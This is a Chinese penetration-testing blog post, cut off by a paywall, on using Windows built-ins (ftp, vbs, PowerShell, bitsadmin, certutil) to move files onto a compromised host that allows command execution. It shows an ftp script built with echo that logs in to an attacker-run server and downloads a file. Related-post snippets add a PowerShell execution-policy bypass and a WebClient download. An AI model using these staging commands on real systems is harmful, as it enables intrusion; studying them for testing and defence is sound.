内网渗透中Windows下的内网传输技术

最新推荐文章于 2024-08-26 22:34:26 发布
最新推荐文章于 2024-08-26 22:34:26 发布
阅读量603 收藏 1
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wo41ge/article/details/111352175
版权
本文探讨了在Windows内网渗透中,当不能直接上传shell但能执行命令时,如何利用ftp、vbs、powershell、bitsadmin和certutil等工具进行文件的上传与下载。详细介绍了每种方法的环境部署、执行步骤及注意事项,提供了实战中的应用示例。
摘要由CSDN通过智能技术生成

目录

前言

有时候我们拿到一个不能上传shell,但可以命令执行的windows服务器时,可以通过多种方法进行文件上传和下载。

ftp

环境部署

  • 首先,ftp支持ASCII码传输、也支持二进制传输,因此完全可以满足我们的上传下载需求。
  • 我们可以在本地服务器先搭建一个ftp服务器
  • 创建一个用户
  • 靶机连接上ftp服务器之后,我们就可以进行上传、下载操作了。

上传和下载

  • ftp可以读取txt中的命令并执行,因此可以把需要执行的命令写入到一个txt文件中
echo open ip >>ftp.txt //连接到ftp服务器
echo monster >>ftp.txt //输入用户名 
echo abc123456 >>ftp.txt //输入密码
echo bin >>ftp.txt //开始
echo get hello.txt >>ftp.txt //下载hello.txt文件
echo bye >>ftp.txt //关闭连接

  • 写入后,靶机中会生成一个ftp.txt文件:

  • 通过命令行执行该文件


                

                
                
        

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  每天都要努力哇
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
内网渗透-Windows内网渗透

				
			

			

				

					lza20001103的博客
				

				

					08-15
					
					1911
					
				

			

		

		

			
				
内网渗透-Windows内网渗透
文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.

			
		

	



                

              
                



	

		

			

				
					
【渗透笔记】内网文件传输

				
			

			

				

					白菜猪肉炖粉条
				

				

					01-04
					
					892
					
				

			

		

		

			
				
Windows
FTP
ftp没有设置认证,允许匿名登录的话,攻击者如果知道了机器开启ftp协议,他可以直接登录机器。
还有ftp要做一个比较好的目录权限控制,即使设置了账号密码,攻击者可以通过爆破,如果ftp目录有读取写入执行权限,攻击者会上传文件进而反弹shell。
py开启ftp服务
pip3 install pyftpdlib
python3 -m pyftpdlib

脚本文件ftp.txt,用于连接ftp服务,下载文件
copy con ftp.txt
open 192.168.1.111 21

			
		

	



                


  
              

                


	

		

			

				
					
内网文件传输

				
			

			

				

					weixin_30794499的博客
				

				

					07-08
					
					872
					
				

			

		

		

			
				
转自:https://github.com/l3m0n/pentest_study
windows文件传输
1、powershell文件下载 powershell突破限制执行:powershell -ExecutionPolicy Bypass -File .\1.ps1
$d = New-Object System.Net.WebClient
$d.DownloadFile("http...

			
		

	





	

		

			

				
					
Win11电脑局域网内互传文件

					
最新发布

				
			

			

				

					weixin_52554142的博客
				

				

					08-26
					
					377
					
				

			

		

		

			
				
局域网实现文件传输和共享

			
		

	



		

			
		



	

		

			

				
					
内网横向——文件传输

				
			

			

				

					qq_55202378的博客
				

				

					07-27
					
					851
					
				

			

		

		

			
				
网络拓扑:攻击机kali IP:192.168.111.0跳板机win7 IP:192.168.111.128,192.168.52.143靶机win server 2008 IP:192.168.52.138。

			
		

	





	

		

			

				
					
内网渗透之——数据压缩、传输

				
			

			

				

					01-09
				

			

		

		

			
				
windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 -r包括子目录 -m 设置压缩比  -m0 存储 添加到压缩文件时不压缩文件。  -m1 ...

			
		

	





	

		

			

				
					
内网渗透文件传输   作者:Micropoor.pdf

				
			

			

				

					04-08
				

			

		

		

			
				
文件传输内网渗透过程的一项关键技术。在渗透测试或攻击活动,攻击者需要将工具、恶意软件或数据从一个系统传输到另一个系统。有效的文件传输方法能够帮助攻击者完成任务的同时降低被检测的风险。  #### 知识...

			
		

	





	

		

			

				
					
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了

				
			

			

				

					等风来
				

				

					01-10
					
					2690
					
				

			

		

		

			
				
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。

			
		

	





	

		

			

				
					
内网传输神器飞秋2013

				
			

			

				

					09-29
				

			

		

		

			
				
内网传输神器飞秋2013,绿色版,免安装,开箱即用,方便快捷

			
		

	





	

		

			

				
					
内网工作文件传送工具

				
			

			

				

					09-02
				

			

		

		

			
				
一个用于内部网的大文件传送的工具,无需服务器,无需连接因特网,不会上传到第3方服务器。

			
		

	





	

		

			

				
					
局域网传输利器在局域网内,可以非常快速的传送近10G的大文件,时间大概5分钟

				
			

			

				

					03-31
				

			

		

		

			
				
局域网传输利器在局域网内,可以非常快速的传送近10G的大文件,时间大概5分钟

			
		

	





	

		

			

				
					
多台linux系统内网传输文件、文件夹

				
			

			

				

					qq_38828287的博客
				

				

					04-24
					
					500
					
				

			

		

		

			
				
实验环境:虚拟机开启两个系统,一个CentOS 8,一个Ubuntu22.04。实验环境:虚拟机开启两个系统,一个CentOS 8,一个Ubuntu22.04。遇到问题:交付服务器,同内网内,客户需要把旧服务器4T数据拷贝到新服务器。遇到问题:交付服务器,同内网内,客户需要把旧服务器4T数据拷贝到新服务器。最后提醒,需要在root权限下,不管是输入命令还是需要验证目标ip的用户。当需要传输文件是scp即可,需要传输文件夹时需要scp –r。Scp –r 用户名@内网ip:/文件路径  /本地目录。

			
		

	





	

		

			

				
					
内网ip如何传输文件

				
			

			

				

					Know Destiny的博客
				

				

					12-07
					
					5052
					
				

			

		

		

			
				
内网ip如何传输文件
1.一种是scp
scp 目录/文件名.文件格式 目标服务器用户名@ip地址:目标服务器目录
例如:scp /usr/sdc/local/web/start.sh root@要传输的ip: /usr/sdc/local/web/
2.建立隧道
进入带有公网ip的ip
找到属性

点击添加

点击新建,输入内网ip,端口输入刚才填入的722/822/922之类的,输入账号密码后,点击确定

连接成功,下次直接点击就好不用再次连接

...

			
		

	





	

		

			

				
					
Linux 内网-局域网文件快速传输

					
热门推荐

				
			

			

				

					悟能的师兄的专栏
				

				

					11-19
					
					1万+
					
				

			

		

		

			
				
Linux 内网-局域网文件快速传输

			
		

	





	

		

			

				
					
9.新建FTP实现内网文件传输

				
			

			

				

					qq_34597555的博客
				

				

					10-12
					
					1221
					
				

			

		

		

			
				
1.打开控制面板,点击“程序”,选择“打开或关闭windows功能”



2.勾选红框下面的选项,最后点确定。



3.打开控制面板,选择管理工具,点击“Internet 信息服务(IIS)管理器“





4.右击选择添加“FTP站点“









5.在控制面板,按如下路径打开“控制面板\所有控制面板项\Windows 防火墙\允许的程序







最后成功访问结果如下:

...

			
		

	





	

		

			

				
					
内网传输之共享文件

				
			

			

				

					寻找自我,挑战自我!
				

				

					03-08
					
					1174
					
				

			

		

		

			
				
本机环境win7. 
首先,新建测试文件夹test,新建测试文件tt.txt 
 
然后,设置共享文件夹属性。 
 
 
切换到安全选项 
 
 
 
确定,关闭。 
最后,在欲共享的机器上,输入\ip\test,回车即可看到共享文件。

			
		

	





	

		

			

				
					

				
			

			

				

					
				

			

		

		

			
				

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值